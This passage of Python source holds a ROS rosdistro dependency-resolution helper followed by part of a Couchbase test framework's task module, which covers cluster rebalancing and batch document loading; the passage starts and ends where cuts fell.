from urllib.error import HTTPError
except ImportError:
from urllib2 import urlopen
from urllib2 import HTTPError
import yaml
from .common import error
from .common import info
from .common import warning
RES_DICT = {'build': [], 'buildtool': [], 'test': [], 'run': []}
RES_TREE = {'build': {}, 'buildtool': {}, 'test': {}, 'run': {}}
CACHE_VERSION = 1
walks = {
'FULL_WALK': {'build': ['build', 'run', 'buildtool', 'test'],
'run': ['build', 'run', 'buildtool', 'test'],
'buildtool': ['build', 'run', 'buildtool', 'test'],
'test': ['build', 'run', 'buildtool', 'test']},
'SPIRAL_OF_DOOM': {'build': ['run'],
'run': ['buildtool'],
'buildtool': ['test'],
'test': ['build']}
}
def invert_dict(d):
inverted = {}
for key, value in d.iteritems():
for v in value:
v_keys = inverted.setdefault(v, [])
if key not in v_keys:
v_keys.append(key)
return inverted
class RosDistro:
def __init__(self, name, cache_location=None):
self.depends_on1_cache = copy.deepcopy(RES_TREE)
t1 = threading.Thread(target=self._construct_rosdistro_file, args=(name,))
t2 = threading.Thread(target=self._construct_rosdistro_dependencies, args=(name, cache_location,))
t1.start()
t2.start()
t1.join()
t2.join()
def _construct_rosdistro_file(self, name):
self.distro_file = RosDistroFile(name)
def _construct_rosdistro_dependencies(self, name, cache_location):
self.depends_file = RosDependencies(name, cache_location)
def get_repositories(self):
return self.distro_file.repositories
def get_repository(self, repo):
return self.get_repositories()[repo]
def get_packages(self):
return self.distro_file.packages
def get_package(self, pkg):
return self.get_packages()[pkg]
def get_rosinstall(self, items, version='last_release', source='vcs'):
rosinstall = ""
for p in self._convert_to_pkg_list(items):
rosinstall += p.get_rosinstall(version, source, self.distro_file.name)
return rosinstall
def _get_depends_on1(self, package_name):
if package_name in self.depends_on1_cache:
return self.depends_on1_cache[package_name]
res = copy.deepcopy(RES_DICT)
for pkg in self.get_packages():
for key, depends in self._get_depends1(pkg).iteritems():
if package_name in depends:
res[key].append(pkg)
self.depends_on1_cache[package_name] = res
return res
def get_depends_on1(self, items):
return self.get_depends_on(items, 1)
def get_depends_on(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
for dep_type, dep_list in res.iteritems():
self._get_depends_on_recursive(p.name, dep_type, invert_dict(dep_dict), dep_list, depth, 1)
return res
def _get_depends_on_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps_on = self._get_depends_on1(package_name)
# merge and recurse
for d in deps_on[dep_type]:
if d not in res:
res.append(d)
if depth == 0 or curr_depth < depth:
for next_dep_type in dep_dict[dep_type]:
self._get_depends_on_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth + 1)
def _get_depends1(self, package_name):
p = self.distro_file.packages[package_name]
return self.depends_file.get_dependencies(p, self.distro_file.name)
def get_depends1(self, items):
return self.get_depends(items, 1)
def get_depends(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
for dep_type, dep_list in res.iteritems():
self._get_depends_recursive(p.name, dep_type, dep_dict, dep_list, depth, 1)
return res
def _get_depends_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps1 = self._get_depends1(package_name)
# merge and recurse
for d in deps1[dep_type]:
if d not in res:
res.append(d)
if depth == 0 or curr_depth < depth:
if d in self.get_packages(): # recurse on packages only
for next_dep_type in dep_dict[dep_type]:
self._get_depends_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth + 1)
def _convert_to_pkg_list(self, items):
if type(items) != list:
items = [items]
pkgs = []
for i in items:
if i in self.distro_file.repositories:
for p in self.distro_file.repositories[i].packages:
if p not in pkgs:
pkgs.append(p)
elif i in self.distro_file.packages:
if not self.distro_file.packages[i] in pkgs:
pkgs.append(self.distro_file.packages[i])
else:
raise RuntimeError("!!! {0} is not a package name nor a repository name".format(i))
return pkgs
class RosDistroFile:
def __init__(self, name):
self.packages = {}
self.repositories = {}
self.name = name
# parse ros distro file
distro_url = urlopen('https://raw.github.com/ros/rosdistro/master/releases/%s.yaml' % name)
distro = yaml.load(distro_url.read())['repositories']
# loop over all repo's
for repo_name, data in distro.iteritems():
repo = RosRepository(repo_name, data['version'], data['url'])
self.repositories[repo_name] = repo
if 'packages' not in data: # support unary disto's
data['packages'] = {repo_name: ''}
# loop over all packages
for pkg_name in data['packages'].keys():
pkg = RosPackage(pkg_name, repo)
repo.packages.append(pkg)
self.packages[pkg_name] = pkg
class RosRepository:
def __init__(self, name, version, url):
self.name = name
self.version = version
self.url = url
self.packages = []
def get_rosinstall(self, version, source):
return "\n".join([p.get_rosinstall(version, source) for p in self.packages])
class RosPackage:
def __init__(self, name, repository):
self.name = name
self.repository = repository
self._package_xmls = {}
self._release_tags = {}
def _fetch_package_xml(self, rosdistro):
repo = self.repository
if 'github.com' in repo.url:
url = repo.url
release_tag = 'release/{0}/{1}/{2}'.format(rosdistro, self.name, repo.version)
url = url.replace('.git', '/{0}/package.xml'.format(release_tag))
url = url.replace('git://', 'https://')
url = url.replace('https://', 'https://raw.')
try:
try:
package_xml = urlopen(url).read()
except Exception as e:
msg = "Failed to read package.xml file from url '{0}': {1}".format(url, e)
warning(msg)
upstream_version = repo.version.split('-')[0]
legacy_release_tag = 'release/{0}/{1}'.format(self.name, upstream_version)
url = url.replace(release_tag, legacy_release_tag)
info("Trying to read from legacy-style url '{0}' instead".format(url))
package_xml = urlopen(url).read()
except Exception as e:
msg += '\nAND\n'
msg += "Failed to read package.xml file from url '{0}': {1}".format(url, e)
raise RuntimeError(msg)
self._package_xmls[rosdistro] = package_xml
self._release_tags[rosdistro] = release_tag
return package_xml, release_tag
else:
raise Exception("Non-github repositories are net yet supported by the rosdistro tool")
def get_package_xml(self, rosdistro):
if rosdistro not in self._package_xmls:
self._fetch_package_xml(rosdistro)
return self._package_xmls[rosdistro]
def get_release_tag(self, rosdistro):
if rosdistro not in self._release_tags:
self._fetch_package_xml(rosdistro)
return self._release_tags[rosdistro]
def get_rosinstall(self, version, source, rosdistro):
# can't get last release of unreleased repository
if version == 'last_release' and not self.repository.version:
raise RuntimeError("Can't get the last release of unreleased repository {0}".format(self.repository.name))
# set specific version of last release of needed
if version == 'last_release':
version = self.repository.version.split('-')[0]
# generate the rosinstall file
release_tag = self.get_release_tag(rosdistro)
if version == 'master':
return yaml.dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': '/'.join(release_tag.split('/')[:-1])
}}],
default_style=False)
else:
if source == 'vcs':
return yaml.safe_dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': release_tag
}}],
default_style=False)
elif source == 'tar':
uri = self.repository.url
uri = uri.replace('git://', 'https://')
uri = uri.replace('.git', '/archive/{0}.tar.gz'.format(release_tag))
return yaml.safe_dump([{
'tar': {
'local-name': self.name,
'uri': uri,
'version': '{0}-release-{1}'.format(self.repository.name, release_tag.replace('/', '-'))
}}],
default_style=False)
else:
raise RuntimeError("Invalid source type {0}".format(source))
class RosDependencies:
def __init__(self, name, cache_location):
# url's
self.file_name = '%s-dependencies.yaml' % name
if cache_location:
self.local_url = os.path.join(cache_location, self.file_name)
else:
from rospkg import environment
self.local_url = os.path.join(environment.get_ros_home(), self.file_name)
self.server_url = 'http://www.ros.org/rosdistro/%s-dependencies.tar.gz' % name
self.dependencies = {}
# initialize with the local or server cache
deps = self._read_local_cache()
if deps == {}:
deps = self._read_server_cache()
for key, value in deps.iteritems():
self.dependencies[key] = value
if self.cache == 'server':
self._write_local_cache()
def get_dependencies(self, package, rosdistro):
repo = package.repository
# support unreleased stacks
if not repo.version:
return copy.deepcopy(RES_DICT)
key = '%s?%s?%s' % (repo.name, repo.version, package.name)
# check in memory first
if key in self.dependencies:
return self.dependencies[key]
# read server cache if needed
if self.cache != 'server':
deps = self._read_server_cache()
for key, value in deps.iteritems():
self.dependencies[key] = value
self._write_local_cache()
if key in self.dependencies:
return self.dependencies[key]
# retrieve dependencies
deps = retrieve_dependencies(package.get_package_xml(rosdistro))
self.dependencies[key] = deps
self._write_local_cache()
return deps
def _read_server_cache(self):
self.cache = 'server'
try:
resp = urlopen(self.server_url)
except HTTPError as ex:
warning("Failed to read server cache: %s" % ex)
return {}
with tempfile.NamedTemporaryFile('w') as fh:
fh.write(resp.read())
fh.flush()
tar = tarfile.open(fh.name, 'r')
data = tar.extractfile(self.file_name)
deps = yaml.load(data.read())
if not deps \
or 'cache_version' not in deps \
or deps['cache_version'] != CACHE_VERSION \
or 'repositories' not in deps:
raise
return deps['repositories']
def _read_local_cache(self):
try:
self.cache = 'local'
with open(self.local_url) as f:
deps = yaml.safe_load(f.read())
if not deps \
or 'cache_version' not in deps \
or deps['cache_version'] != CACHE_VERSION \
or 'repositories' not in deps:
raise
return deps['repositories']
except Exception:
return {}
def _write_local_cache(self):
try:
try:
os.makedirs(os.path.dirname(self.local_url))
except:
pass
with open(self.local_url, 'w') as f:
yaml.dump({'cache_version': CACHE_VERSION,
'repositories': self.dependencies},
f)
except Exception as ex:
error("Failed to write local dependency cache to %s: %s" % (self.local_url, ex))
def retrieve_dependencies(package_xml):
try:
return get_package_dependencies(package_xml)
except Exception:
raise RuntimeError("Failed to get dependencies from package_xml:\n```\n{0}\n```".format(package_xml))
def get_package_dependencies(package_xml):
if not os.path.abspath("/usr/lib/pymodules/python2.7") in sys.path:
sys.path.append("/usr/lib/pymodules/python2.7")
from catkin_pkg import package as catkin_pkg
pkg = catkin_pkg.parse_package_string(package_xml)
depends1 = {'build': [d.name for d in pkg.build_depends],
'buildtool': [d.name for d in pkg.buildtool_depends],
'test': [d.name for d in pkg.test_depends],
'run': [d.name for d in pkg.run_depends]}
return depends1
|
task.py
|
"""
Created on Sep 14, 2017
@author: riteshagarwal
"""
import copy
import json
import json as Json
import os
import random
import socket
import threading
import time
from copy import deepcopy
import zlib
from httplib import IncompleteRead
import com.couchbase.test.transactions.SimpleTransaction as Transaction
from _threading import Lock
from com.couchbase.client.java.json import JsonObject
from java.lang import Thread
from java.util.concurrent import Callable
from reactor.util.function import Tuples
from BucketLib.BucketOperations import BucketHelper
from BucketLib.MemcachedOperations import MemcachedHelper
from BucketLib.bucket import Bucket
from Cb_constants import constants, CbServer, DocLoading
from CbasLib.CBASOperations import CBASHelper
from CbasLib.cbas_entity import Dataverse, CBAS_Collection, Dataset, Synonym, \
CBAS_Index, CBAS_UDF
from Jython_tasks.task_manager import TaskManager
from cb_tools.cbstats import Cbstats
from collections_helper.collections_spec_constants import MetaConstants
from common_lib import sleep
from couchbase_helper.document import DesignDocument
from couchbase_helper.documentgenerator import BatchedDocumentGenerator, \
SubdocDocumentGenerator
from global_vars import logger
from custom_exceptions.exception import \
N1QLQueryException, DropIndexException, CreateIndexException, \
DesignDocCreationException, QueryViewException, ReadDocumentException, \
RebalanceFailedException, ServerUnavailableException, \
BucketCreationException, AutoFailoverException, GetBucketInfoFailed, \
CompactViewFailed, SetViewInfoNotFound, FailoverFailedException, \
BucketFlushFailed
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteUtilHelper, RemoteMachineShellConnection
from sdk_exceptions import SDKException
from table_view import TableView, plot_graph
from testconstants import INDEX_QUOTA, FTS_QUOTA, CBAS_QUOTA, MIN_KV_QUOTA
from gsiLib.GsiHelper_Rest import GsiHelper
class Task(Callable):
def __init__(self, thread_name):
self.thread_name = thread_name
self.exception = None
self.completed = False
self.started = False
self.start_time = None
self.end_time = None
self.log = logger.get("infra")
self.test_log = logger.get("test")
self.result = False
self.sleep = time.sleep
def __str__(self):
if self.exception:
raise self.exception
elif self.completed:
self.log.info("Task %s completed on: %s"
% (self.thread_name,
str(time.strftime("%H:%M:%S",
time.gmtime(self.end_time)))))
return "%s task completed in %.2fs" % \
(self.thread_name, self.completed - self.started,)
elif self.started:
return "Thread %s at %s" % \
(self.thread_name,
str(time.strftime("%H:%M:%S",
time.gmtime(self.start_time))))
else:
return "[%s] not yet scheduled" % self.thread_name
def start_task(self):
self.started = True
self.start_time = time.time()
self.log.info("Thread '%s' started" % self.thread_name)
def set_exception(self, exception):
self.exception = exception
self.complete_task()
raise BaseException(self.exception)
def set_warn(self, exception):
self.exception = exception
self.complete_task()
self.log.warn("Warning from '%s': %s" % (self.thread_name, exception))
def complete_task(self):
self.completed = True
self.end_time = time.time()
self.log.info("Thread '%s' completed" % self.thread_name)
def set_result(self, result):
self.result = result
def call(self):
raise NotImplementedError
@staticmethod
def wait_until(value_getter, condition, timeout_secs=300):
"""
Repeatedly calls value_getter returning the value when it
satisfies condition. Calls to value getter back off exponentially.
Useful if you simply want to synchronously wait for a condition to be
satisfied.
:param value_getter: no-arg function that gets a value
:param condition: single-arg function that tests the value
:param timeout_secs: number of seconds after which to timeout
default=300 seconds (5 mins.)
:return: the value returned by value_getter
:raises: Exception if the operation times out before
getting a value that satisfies condition
"""
start_time = time.time()
stop_time = start_time + timeout_secs
interval = 0.01
attempt = 0
value = value_getter()
logger.get("infra").debug(
"Wait for expected condition to get satisfied")
while not condition(value):
now = time.time()
if timeout_secs < 0 or now < stop_time:
sleep(2 ** attempt * interval)
attempt += 1
value = value_getter()
else:
raise Exception('Timeout after {0} seconds and {1} attempts'
.format(now - start_time, attempt))
return value
class FunctionCallTask(Task):
""" A task that calls a given function `f` with arguments `args` and key-word arguments `kwds` """
def __init__(self, f, args=(), kwds={}):
""" The constructor.
Args:
f (function): The function to call.
args (tuple): A tuple of arguments for the function `f`.
kwds (dict): A dictionary of keyword arguments for the function `f`.
"""
super(FunctionCallTask, self).__init__("FunctionCallTask: function:{} Args:{} Kwds:{}".format(f, args, kwds))
self.f, self.args, self.kwds = f, args, kwds
def call(self):
""" Calls the function f """
self.start_task()
result = self.f(*self.args, **self.kwds)
self.complete_task()
return result
class RebalanceTask(Task):
def __init__(self, servers, to_add=[], to_remove=[], do_stop=False,
progress=30, use_hostnames=False, services=None,
check_vbucket_shuffling=True, sleep_before_rebalance=0,
retry_get_process_num=25):
super(RebalanceTask, self).__init__(
"Rebalance_task_IN=[{}]_OUT=[{}]_{}"
.format(",".join([node.ip for node in to_add]),
",".join([node.ip for node in to_remove]),
str(time.time())))
self.servers = servers
self.to_add = to_add
self.to_remove = to_remove
self.start_time = None
self.services = services
self.monitor_vbuckets_shuffling = False
self.check_vbucket_shuffling = check_vbucket_shuffling
self.result = False
self.retry_get_process_num = retry_get_process_num
try:
self.rest = RestConnection(self.servers[0])
except ServerUnavailableException, e:
self.test_log.error(e)
raise e
self.retry_get_progress = 0
self.use_hostnames = use_hostnames
self.previous_progress = 0
self.old_vbuckets = {}
self.thread_used = "Rebalance_task"
cluster_stats = self.rest.get_cluster_stats()
self.table = TableView(self.test_log.info)
self.table.set_headers(["Nodes", "Services", "Version",
"CPU", "Status"])
node_ips_to_remove = [node.ip for node in to_remove]
for node, stat in cluster_stats.items():
node_ip = node.split(':')[0]
node_status = "Cluster node"
if node_ip in node_ips_to_remove:
node_status = "--- OUT --->"
self.table.add_row([node_ip, ", ".join(stat["services"]),
stat["version"], stat["cpu_utilization"],
node_status])
def __str__(self):
if self.exception:
return "[%s] %s download error %s in %.2fs" % \
(self.thread_name, self.num_items, self.exception,
self.completed - self.started,) # , self.result)
elif self.completed:
self.test_log.debug("Time: %s"
% str(time.strftime("%H:%M:%S",
time.gmtime(time.time()))))
return "[%s] %s items loaded in %.2fs" % \
(self.thread_name, self.loaded,
self.completed - self.started,) # , self.result)
elif self.started:
return "[%s] %s started at %s" % \
(self.thread_name, self.num_items, self.started)
else:
return "[%s] %s not yet scheduled" % \
(self.thread_name, self.num_items)
def call(self):
self.start_task()
try:
if len(self.to_add) and len(self.to_add) == len(self.to_remove):
node_version_check = self.rest.check_node_versions()
non_swap_servers = set(self.servers) - set(
self.to_remove) - set(self.to_add)
if self.check_vbucket_shuffling:
self.old_vbuckets = BucketHelper(
self.servers[0])._get_vbuckets(non_swap_servers, None)
if self.old_vbuckets and self.check_vbucket_shuffling:
self.monitor_vbuckets_shuffling = True
if self.monitor_vbuckets_shuffling \
and node_version_check and self.services:
for service_group in self.services:
if "kv" not in service_group:
self.monitor_vbuckets_shuffling = False
if self.monitor_vbuckets_shuffling and node_version_check:
services_map = self.rest.get_nodes_services()
for remove_node in self.to_remove:
key = "{0}:{1}".format(remove_node.ip,
remove_node.port)
services = services_map[key]
if "kv" not in services:
self.monitor_vbuckets_shuffling = False
if self.monitor_vbuckets_shuffling:
self.test_log.debug("Will monitor vbucket shuffling for "
"swap rebalance")
self.add_nodes()
self.start_rebalance()
self.table.display("Rebalance Overview")
self.check()
# self.task_manager.schedule(self)
except Exception as e:
self.exception = e
self.result = False
self.test_log.error(str(e))
return self.result
self.complete_task()
self.result = True
return self.result
def add_nodes(self):
master = self.servers[0]
services_for_node = None
node_index = 0
for node in self.to_add:
if self.services is not None:
services_for_node = [self.services[node_index]]
node_index += 1
self.table.add_row([node.ip, services_for_node, "", "",
"<--- IN ---"])
if self.use_hostnames:
self.rest.add_node(master.rest_username, master.rest_password,
node.hostname, node.port,
services=services_for_node)
else:
self.rest.add_node(master.rest_username, master.rest_password,
node.ip, node.port,
services=services_for_node)
def start_rebalance(self):
nodes = self.rest.node_statuses()
# Determine whether its a cluster_run/not
cluster_run = True
firstIp = self.servers[0].ip
if len(self.servers) == 1 and self.servers[0].port == '8091':
cluster_run = False
else:
for node in self.servers:
if node.ip != firstIp:
cluster_run = False
break
remove_node_msg = "Removing node {0}:{1} from cluster"
ejectedNodes = list()
for server in self.to_remove:
for node in nodes:
if cluster_run:
if int(server.port) == int(node.port):
ejectedNodes.append(node.id)
self.test_log.debug(remove_node_msg.format(node.ip,
node.port))
else:
if self.use_hostnames:
if server.hostname == node.ip \
and int(server.port) == int(node.port):
ejectedNodes.append(node.id)
self.test_log.debug(remove_node_msg
.format(node.ip, node.port))
elif server.ip == node.ip \
and int(server.port) == int(node.port):
ejectedNodes.append(node.id)
self.test_log.debug(remove_node_msg.format(node.ip,
node.port))
self.rest.rebalance(otpNodes=[node.id for node in nodes],
ejectedNodes=ejectedNodes)
self.start_time = time.time()
def check(self):
self.poll = True
while self.poll:
self.poll = False
try:
if self.monitor_vbuckets_shuffling:
non_swap_servers = set(self.servers) - set(
self.to_remove) - set(self.to_add)
new_vbuckets = BucketHelper(self.servers[0])._get_vbuckets(
non_swap_servers, None)
for vb_type in ["active_vb", "replica_vb"]:
for srv in non_swap_servers:
if set(self.old_vbuckets[srv][vb_type]) != set(
new_vbuckets[srv][vb_type]):
msg = "%s vBuckets were shuffled on %s! " \
"Expected: %s, Got: %s" \
% (vb_type, srv.ip,
self.old_vbuckets[srv][vb_type],
new_vbuckets[srv][vb_type])
self.test_log.error(msg)
raise Exception(msg)
(status, progress) = self.rest._rebalance_status_and_progress()
self.test_log.info("Rebalance - status: %s, progress: %s",
status,
progress)
# if ServerUnavailableException
if progress == -100:
self.retry_get_progress += 1
if self.previous_progress != progress:
self.previous_progress = progress
self.retry_get_progress = 0
else:
self.retry_get_progress += 1
except RebalanceFailedException as ex:
self.result = False
raise ex
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
raise e
if self.rest.is_cluster_mixed():
""" for mix cluster, rebalance takes longer """
self.test_log.debug("Rebalance in mix cluster")
self.retry_get_process_num = 40
# we need to wait for status to be 'none'
# (i.e. rebalance actually finished and not just 'running' and at 100%)
# before we declare ourselves done
if progress != -1 and status != 'none':
if self.retry_get_progress < self.retry_get_process_num:
self.log.debug("Wait before next rebalance progress check")
sleep(5, log_type="infra")
self.poll = True
else:
self.result = False
self.rest.print_UI_logs()
raise RebalanceFailedException(
"seems like rebalance hangs. please check logs!")
else:
success_cleaned = []
for removed in self.to_remove:
try:
rest = RestConnection(removed)
except ServerUnavailableException, e:
self.test_log.error(e)
continue
start = time.time()
while time.time() - start < 30:
try:
if 'pools' in rest.get_pools_info() and \
(len(rest.get_pools_info()["pools"]) == 0):
success_cleaned.append(removed)
break
except (ServerUnavailableException, IncompleteRead), e:
self.test_log.error(e)
for node in set(self.to_remove) - set(success_cleaned):
self.test_log.error(
"Node {0}:{1} was not cleaned after removing from cluster"
.format(node.ip, node.port))
self.result = False
self.test_log.info(
"Rebalance completed with progress: {0}% in {1} sec"
.format(progress, time.time() - self.start_time))
self.result = True
return
class GenericLoadingTask(Task):
def __init__(self, cluster, bucket, client, batch_size=1,
timeout_secs=5, time_unit="seconds", compression=None,
retries=5,
suppress_error_table=False, sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
preserve_expiry=None, sdk_retry_strategy=None):
super(GenericLoadingTask, self).__init__("Loadgen_task_%s_%s_%s_%s"
% (bucket, scope, collection,
time.time()))
self.batch_size = batch_size
self.timeout = timeout_secs
self.time_unit = time_unit
self.cluster = cluster
self.bucket = bucket
self.scope = scope
self.collection = collection
self.client = client
self.sdk_client_pool = sdk_client_pool
self.random = random.Random()
self.compression = compression
self.retries = retries
self.suppress_error_table = suppress_error_table
self.docs_loaded = 0
self.preserve_expiry = preserve_expiry
self.sdk_retry_strategy = sdk_retry_strategy
def call(self):
self.start_task()
try:
while self.has_next():
self.next()
except Exception as e:
self.test_log.error(e)
self.set_exception(Exception(e.message))
return
self.complete_task()
def has_next(self):
raise NotImplementedError
def next(self):
raise NotImplementedError
# start of batch methods
def batch_create(self, key_val, client=None, persist_to=0,
replicate_to=0,
doc_type="json", durability="", skip_read_on_error=False):
"""
standalone method for creating key/values in batch (sans kvstore)
arguments:
key_val -- array of key/value dicts to load size = self.batch_size
client -- optional client to use for data loading
"""
success = dict()
fail = dict()
try:
client = client or self.client
success, fail = client.set_multi(
key_val, self.exp, exp_unit=self.exp_unit,
persist_to=persist_to, replicate_to=replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=doc_type, durability=durability,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail:
failed_item_table = None
if not self.suppress_error_table:
failed_item_table = TableView(self.test_log.info)
failed_item_table.set_headers(["Create Key",
"Exception"])
if not skip_read_on_error:
self.log.debug(
"Sleep before reading the doc for verification")
Thread.sleep(self.timeout)
# self.test_log.debug("Reading values {0} after failure"
# .format(fail.keys()))
read_map, _ = self.batch_read(fail.keys())
for key, value in fail.items():
if key in read_map and read_map[key]["cas"] != 0:
success[key] = value
success[key].pop("error")
fail.pop(key)
elif not self.suppress_error_table:
failed_item_table.add_row([key, value['error']])
elif not self.suppress_error_table:
for key, value in fail.items():
failed_item_table.add_row([key, value['error']])
if not self.suppress_error_table:
failed_item_table.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, copy.deepcopy(fail)
except Exception as error:
self.test_log.error(error)
return success, copy.deepcopy(fail)
def batch_update(self, key_val, client=None, persist_to=0,
replicate_to=0,
doc_type="json", durability="", skip_read_on_error=False):
success = dict()
fail = dict()
try:
client = client or self.client
success, fail = client.upsert_multi(
key_val, self.exp, exp_unit=self.exp_unit,
persist_to=persist_to, replicate_to=replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=doc_type, durability=durability,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail:
key_val = dict(key_val)
if not self.suppress_error_table:
failed_item_table = TableView(self.test_log.info)
failed_item_table.set_headers(["Update Key",
"Exception"])
if not skip_read_on_error:
self.log.debug(
"Sleep before reading the doc for verification")
Thread.sleep(self.timeout)
self.test_log.debug("Reading values {0} after failure"
.format(fail.keys()))
read_map, _ = self.batch_read(fail.keys())
for key, value in fail.items():
if key in read_map and read_map[key]["cas"] != 0 \
and value == read_map[key]["value"]:
success[key] = value
success[key].pop("error")
fail.pop(key)
elif not self.suppress_error_table:
failed_item_table.add_row([key, value['error']])
elif not self.suppress_error_table:
for key, value in fail.items():
failed_item_table.add_row([key, value['error']])
if not self.suppress_error_table:
failed_item_table.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, copy.deepcopy(fail)
except Exception as error:
self.test_log.error(error)
return success, copy.deepcopy(fail)
def batch_replace(self, key_val, client=None, persist_to=0,
replicate_to=0,
doc_type="json", durability="",
skip_read_on_error=False):
success = dict()
fail = dict()
try:
client = client or self.client
success, fail = client.replace_multi(
key_val, self.exp, exp_unit=self.exp_unit,
persist_to=persist_to, replicate_to=replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=doc_type, durability=durability,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail:
if not self.suppress_error_table:
failed_item_table = TableView(self.test_log.info)
failed_item_table.set_headers(["Replace Key",
"Exception"])
if not skip_read_on_error:
self.log.debug(
"Sleep before reading the doc for verification")
Thread.sleep(self.timeout)
self.test_log.debug("Reading values {0} after failure"
.format(fail.keys()))
read_map, _ = self.batch_read(fail.keys())
for key, value in fail.items():
if key in read_map and read_map[key]["cas"] != 0:
success[key] = value
success[key].pop("error")
fail.pop(key)
elif not self.suppress_error_table:
failed_item_table.add_row([key, value['error']])
elif not self.suppress_error_table:
for key, value in fail.items():
failed_item_table.add_row([key, value['error']])
if not self.suppress_error_table:
failed_item_table.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, copy.deepcopy(fail)
except Exception as error:
self.test_log.error(error)
return success, copy.deepcopy(fail)
def batch_delete(self, key_val, client=None, persist_to=None,
replicate_to=None,
durability=""):
client = client or self.client
success, fail = client.delete_multi(
dict(key_val).keys(),
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail and not self.suppress_error_table:
failed_item_view = TableView(self.test_log.info)
failed_item_view.set_headers(["Delete Key", "Exception"])
for key, exception in fail.items():
failed_item_view.add_row([key, exception])
failed_item_view.display("Keys failed in %s:%s:%s"
% (client.bucket.name,
self.scope,
self.collection))
return success, fail
def batch_touch(self, key_val, exp=0):
success, fail = self.client.touch_multi(
dict(key_val).keys(),
exp=exp,
timeout=self.timeout,
time_unit=self.time_unit,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail and not self.suppress_error_table:
failed_item_view = TableView(self.test_log.info)
failed_item_view.set_headers(["Touch Key", "Exception"])
for key, exception in fail.items():
failed_item_view.add_row([key, exception])
failed_item_view.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, fail
def batch_read(self, keys, client=None):
client = client or self.client
success, fail = client.get_multi(
keys, timeout=self.timeout,
time_unit=self.time_unit,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail and not self.suppress_error_table:
failed_item_view = TableView(self.test_log.info)
failed_item_view.set_headers(["Read Key", "Exception"])
for key, exception in fail.items():
failed_item_view.add_row([key, exception])
failed_item_view.display("Keys failed in %s:%s:%s"
% (client.bucket.name,
self.scope,
self.collection))
return success, fail
def batch_sub_doc_insert(self, key_value,
persist_to=0, replicate_to=0,
durability="",
create_path=True, xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_insert_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
create_path=create_path,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc insert: {0}"
.format(error))
return success, fail
def batch_sub_doc_upsert(self, key_value,
persist_to=0, replicate_to=0,
durability="",
create_path=True, xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_upsert_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
create_path=create_path,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc upsert: {0}"
.format(error))
return success, fail
def batch_sub_doc_replace(self, key_value,
persist_to=0, replicate_to=0,
durability="", xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_replace_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc upsert: {0}"
.format(error))
return success, fail
def batch_sub_doc_remove(self, key_value,
persist_to=0, replicate_to=0,
durability="", xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_remove_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc remove: {0}"
.format(error))
return success, fail
def batch_sub_doc_read(self, key_value, xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_read_multi(
key_value,
timeout=self.timeout,
time_unit=self.time_unit,
xattr=xattr)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc read: {0}"
.format(error))
return success, fail
class LoadDocumentsTask(GenericLoadingTask):
def __init__(self, cluster, bucket, client, generator, op_type,
exp, random_exp=False, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
proxy_client=None, batch_size=1, timeout_secs=5,
compression=None, retries=5,
durability="", task_identifier="", skip_read_on_error=False,
suppress_error_table=False, sdk_client_pool=None,
